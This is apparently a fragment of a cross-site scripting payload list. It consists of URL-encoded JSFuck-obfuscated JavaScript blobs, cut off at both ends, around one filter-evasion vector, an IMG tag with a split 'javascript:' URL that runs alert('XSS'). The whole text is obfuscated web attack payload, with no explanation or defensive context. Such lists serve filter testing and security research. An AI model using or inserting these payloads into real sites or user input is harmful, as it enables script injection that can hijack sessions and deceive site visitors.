B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%5D%5B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%28%2B%5B%5D%29%5B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%21%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%5D%5D%28%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%29%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%5B%21%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%2B%28%21%2B%5B%5D%2B%21%2B%5B%5D%2B%5B%2B%21%2B%5B%5D%5D%2B%5B%2B%21%2B%5B%5D%5D%29%29%5B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%5B%5D%2B%5B%5D%29%5B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%5D%5B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%28%2B%5B%5D%29%5B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%21%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%5D%5D%28%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%5B%2B%21%2B%5B%5D%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%5B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%5D%28%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%2B%5B%5D%5D%29%5B%28%5B%21%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%5B%21%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%5D%28%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%21%5B%5D%2B%28%21%5B%5D%2B%5B%2B%5B%5D%5D%29%5B%28%5B%21%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%5B%21%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%5D%28%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%29%28%29%5B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%5D%28%29%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%2B%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%5D%2B%5B%2B%21%2B%5B%5D%5D%2B%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%5B%2B%5B%5D%5D%2B%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%29
<IMG SRC="jav ascript:alert('XSS');">
%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%5B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%5D%28%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%2B%5B%21%5B%5D%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%21%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%2B%28%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%5B%2B%21%2B%5B%5D%5D%29%29%5B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%5B%5D%2B%5B%5D%29%5B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%